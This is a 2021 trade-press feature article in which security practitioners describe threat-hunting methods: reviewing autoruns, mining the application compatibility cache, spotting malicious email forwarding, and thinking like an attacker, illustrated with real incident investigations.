Americas

  • United States

Asia

Oceania

maria_korolov
Contributing writer

Tips and tactics of today’s cybersecurity threat hunters

Feature
May 03, 202114 mins
Advanced Persistent ThreatsSecurityThreat and Vulnerability Management

Having internal threat hunting capability is becoming a necessity for many organizations. Here are the most common things they look for and how they respond to incidents.

target threat hunting program sitting duck duck shooting gallery by roz woodward getty 2400x1600
Credit: Roz Woodward / Getty Images / Target

Threat hunting isn’t just for the biggest organizations anymore. As the SolarWinds attack demonstrated, any size company can be vulnerable to stealthy attackers who worm their way into the enterprise. Even if a company has no assets of interest to foreign spies, financially motivated cybercriminals can use the same access points and evasion techniques.

According to IBM’s Cost of a Data Breach Report 2020, the average organization takes 315 days to detect and contain a breach caused by a malicious attack. The longer the attackers stay inside your systems, the more money it costs. According to IBM, it costs companies an additional $1.12 million if it takes them more than 200 days to detect a breach.

As a result, more companies are hiring threat hunters, training existing staff on threat hunting techniques, or hiring outside firms to provide threat hunting services. “Threat hunting is absolutely a necessity in modern cyber defense,” says Mark Orlando, co-founder and CEO at Bionic Cyber, who teaches threat hunting for the SANS Institute and previously worked on security issues for the Pentagon, White House, and the Department of Energy.

“When I first started in security operations, threat hunting sounded cool, but it was something that only the most advanced teams did,” Orlando says. “It was optional, but now you have these high profile breaches that would not have been discovered unless you had skilled investigators who know how to hunt for these threats. There’s now an awareness that it’s not optional.”

Tips to enhance threat hunting capabilities

He admits that it’s hard to find experienced threat hunters, especially for smaller and mid-sized firms. “But there are lots of things a smaller organization can do to get started. It’s not something where you either have it or you don’t—it’s a continuum.”

If something like SolarWinds happens, he says, all it takes is the ability to be able to read the reports, think about what happened, assess how those threats could show up in their organization, and then apply that knowledge. “That’s all it is—the key is just getting started,” Orlando says. “That tends to be a challenge for medium and smaller organizations.”

Companies can also bring in consultants or service providers or train their existing staff, Orlando says. “That’s something that can be a very minimal investment but can really pay off by making you more resistant to those kinds of attacks.”

It’s not just security teams that can benefit. “If you have software development teams, system administrators, make sure they’re up to speed on modern cyber threats,” says Orlando. “They’re on the front lines of maintaining other systems, and maintaining software like SolarWinds, and they might be in a position to identify something that doesn’t look right.”

What threat hunters do

Threat hunters always have something to do, but they really go into action when there’s an indicator of compromise. Maybe, as with FireEye, corporate assets turn up for sale on the dark web. Or maybe a company learns of indicators that attackers used its compromised SolarWinds software as an entry point. Maybe it’s an alert from an intrusion detection system or a honeypot, or a supplier complains that the money you sent them never arrived. It could be something big and obvious, like a ransomware attack.

Threat hunters determine the extent of the threat, find the initial entry point and close it off, and find and shut down any backdoors or time bombs that may have been installed so that the attackers can be fully cleaned out of the environment.

Here are examples of how they do it.

Check the autoruns

Many systems have an “autorun” function—a set of instructions that executes each time the device is turned on. For example, if malware is detected on a computer and deleted, an autorun might reinstall it.

Checking the autorun instruction sets not only ensures that the malware doesn’t come back, it’s also a way to spot suspicious activity on a system. “In a corporate network, there are going to be thousands of these things,” says Orlando. “Every computer is going to have that list. If you can pull that list together every single day and compare it from one day to the next, you can start to pick up things that are unusual or don’t look right.” That can take a little skill. “You don’t always know what you need to look for,” he says.

It also takes planning. Threat hunters can’t comb through logs that aren’t there or that the attackers have modified to cover their tracks. Enterprises need to make copies of logs and store them in a safe location, such as a SIEM, so that they’re available if needed later.

Figuring out what to keep is a challenge, Orlando says. “You want to have all the visibility and get all the logs and network data but at the same time in a modern network, that’s potentially a very tall order. We’re generating tons and tons of data every single day. It’s not always financially viable to just collect everything.”

Lately, attackers have been using autoruns more cleverly, to execute malware without ever installing anything at all. That’s been showing up in the recent spate of attacks that leveraged the Microsoft Exchange vulnerability, says John Hammond, senior security researcher at Huntress. “Oftentimes, what we would see following the compromise of the Exchange server was ransomware, but what was even more common were cryptocurrency miners,” he says. “It’s a slower way of making money compared to the immediate loud and blatant ransomware.”

Since it’s a slow method, the malware has to be hidden extremely well. He cites a recent example of a local government customer. “They’re aware of the news reports, and they saw some strange traffic,” Hammond says. Some alerts were coming from a machine, but no malware was installed. Instead, it turned out that the attackers had buried their malware like a Russian doll inside an autorun file.

An obfuscated Visual Basic script would spawn a PowerShell script that used hex encoding to hide the fact that it was reaching out to an online endpoint, pulling down code, and invoking it on the fly without ever installing it on the computer. The final piece of the puzzle was the Lemon Duck cryptominer, Hammond says.

“In this specific situation, there were five layers where it would invoke new code on the fly,” Hammond says. “Eventually, in the sixth stage, we find the actual code. That’s the fileless malware. The attackers aren’t going to touch disk; they’ll bundle it up like an onion.”

After that, the team found a few other machines that had the same infection. “It had been running for a few days,” Hammond says. “Our recommendation was to remove the autorun, scrub it clean, remove it from orbit.”

Mine the application compatibility cache

A big manufacturing company suspected that it may have been targeted by attackers. Tim Bandos, CISO and VP of managed security services at Digital Guardian, says that the first footprints that were discovered were in an endpoint’s application compatibility cache. This is a Windows registry key that basically keeps a record of the programs that execute on a device. “The customer had 90,000 endpoints,” he says. “We looked at the application compatibility cache on every single device and searched for any known adversary tools.”

There was a hit—a year and half ago, a suspicious program ran on one of the endpoint devices. “We found ten machines that executed that program on the same date,” Bandos says, a sign that the adversary was moving laterally. “Then we found more indicators. They even installed backdoors over that year and a half, all while remaining undercover.”

By pulling on that first thread, Bandos says, his team discovered an attack that was still ongoing, in which the attackers had compromised more than 70 machines in all, installed several different types of backdoors on 22 devices, and had already stolen data. “It was impossible to determine everything that was taken,” he says, “but we were able to find examples of trade secrets that were stolen. We were able to identify the attackers, a nation-state adversary from China.”

His team also tracked the infection back to its starting point. “It was a supply chain type of attack,” Bandos says. “There was a shipping device that had been breached, a device that they didn’t even manage but was on their network. It was leveraged to piggyback into their environment.”

It’s vital to follow the threat back to its source, not only to close off the original point of entry, but also to determine where else they may have gone from that initial infection. “Make sure you’ve got every system, that there aren’t any other infected machines,” Bandos says. “Then you have your neutralization event—you shut down all the hosts involved in that campaign all at the same time, so there are no open backdoors, and re-image all the devices so they’re all completely wiped.”

Look for forwarded emails

Mailboxes are wonderful targets for attackers, including the gang behind the SolarWinds hack. With a compromised email account, attackers can inject themselves into the middle of conversations, dramatically increasing the odds that their phishing emails will be clicked on. Some multifactor authentication systems allow for email delivery of one-time passwords or allow email-based password resets, enabling attackers to leverage those email accounts to get access to even more systems.

Email compromise is big business. According to the FBI, cybercrime was up 300% last year, with total reported losses exceeding $4.2 billion—and business email compromise scams were the biggest category of crimes. To keep these scams going as long as possible, attackers use a trick: email forwarding.

Most platforms allow emails to be automatically forwarded to other accounts. Attackers can use this so that they can continue to eavesdrop on conversations and make their own scam emails more believable. Sometimes, they use it to cover up ongoing criminal activity, says Willis McDonald, technical principal at Nisos and a former FBI forensics expert.

McDonald has hunted threats in companies of all sizes, in financial institutions, and in government agencies around the world, and has often been called in when companies suspect fraudulent activity. Once recent case was a large manufacturing company with offices around the globe that suspected a problem in its accounts payable department. “They were sourcing materials from many different countries and foreign suppliers,” he says. That made it easy for one individual to hide his criminal activity, diverting payments from one such supplier into his own accounts.

“After a couple of months, the supplier contacted the CFO and the CFO looked into it, realized that they hadn’t been paid, and called us to investigate,” says McDonald. They already had a suspect—the accounts payable employee. “This person was a little more nervous than they should be.”

The thief took quite a few precautions to cover their tracks, he says. At first glance it looked like some random external hacker had done it. “They wanted to be sure that they had the right person.”

The initial clue to the real perpetrator was in a supervisor’s email account to forward the supplier’s real emails and erase them, so that the crook could replace them with fake emails from a dummy account. How did McDonald know to look in the forwarding settings? “In a lot of these compromises, the bad actors all go to the same school,” he says.

He means that literally: Criminals can take actual classes that teach them how to commit these kinds of frauds. “We monitored some of the back and forth between the tutors and the students, saw what types of steps they were taking,” says McDonald.

Criminals can find tutors on the dark web, McDonald says, as well as other services they need to carry out the frauds, such as money mules. This means that criminals often follow the same playbook. “The downside, for the criminal, is that they all perform the same steps, in the same order, and they look eerily similar to each other,” he says. “It can be pretty easy to start pulling at threads.”

A common tactic the thieves use to extend their scams is to intercept emails from the legitimate recipients of the money. Say an email complaining about a payment not being received is intercepted and forwarded to the hacker, and the original erased. The hacker would then send a replacement email from a fake account that looks like the real one, confirming that the payment had been received, and written in a style and format to match the legitimate one.

That’s exactly what had happened in this case. The thief had registered a domain that was similar to that of the supplier, set up a fake email account, and then surreptitiously accessed their supervisor’s email account and set up the forwarding. The thief’s plan was to look just like an external party in a business email compromise scam.

Now, the threat hunters had a thread to pull on. They discovered that the thief set up the dummy account using their own work computer. “They tried to delete the evidence, but there were remnants on their computer.” Companies will often have logs of who was logged into a system when forwarding was set up, so the criminals can be traced that way as well. Or there might be security cameras showing who had access to the computer at the time of the compromise.

It helps if companies have full access to employee devices, McDonald says. “In many places with bring-your-own-device policies, those policies don’t have the teeth needed to actually be able to examine that device if it’s been used for suspected malicious purposes.” Whether the employee was involved or was a victim, forensic investigation of the device can help uncover what really happened. “It’s important to review the policies you have and make sure they have what you need to examine devices if something strange is going on.” That’s especially important with so many people working from home.

This thief also tried to cover their tracks financially. The redirected payment was sent to a money mule. Instead of hiring an anonymous mule on the dark web, they used a friend of a relative.

If the thief had avoided using their work computer, there are still ways to catch them. “There are ways to work with law enforcement and get more information from the hosting provider,” says McDonald. If the IP addresses track back to an employee’s home or a local coffee shop, that’s an indication that the bad guys aren’t random hackers on the other side of the planet but someone close by and within reach of authorities.

The SolarWinds attack has added a new wrinkle to the mailbox scam, McDonald says. Some companies have duplicate Outlook or Exchange servers, either self-hosted or somewhere in the cloud. These legacy servers tend to be ignored, he says. “They’re so noisy with external scans and failed attacks throughout the day.” Or worse, the company has forgotten about them. They’ve moved to Office 365, but left one server up and running because, say, that’s where the CEO has always checked his email and that’s how he likes it.

“In the SolarWinds incident, the attackers were able to compromise these mostly legacy Exchange servers and use them to download mailboxes and extend their access into networks, into hosted services like Office 365 or AWS, with very little indication of how they were able to do this,” says McDonald.

Think like an attacker

Another strategy that threat hunters use is to put themselves in the adversary’s shoes, says Steve Luke, senior principal multi-discipline system engineer at MITRE, which recently launched its MITRE ATT&CK Defender certification program for threat hunters.

Consider the steps an attacker must go through to get to your company’s trade secrets, customer databases, or other valuable data. “What attackers do at the behavioral level is more limited in number and more difficult for the attacker to change compared to the traditional indicators of compromise like domain names and IP addresses,” Luke says.

That gives the defenders a home field advantage. “Focus on the behavioral invariants and design your mitigations around those,” says Luke. “Even if they make a change in how they’re doing it, you still have a chance of detecting it. That’s the best chance a threat hunter has of having a resilient defense.”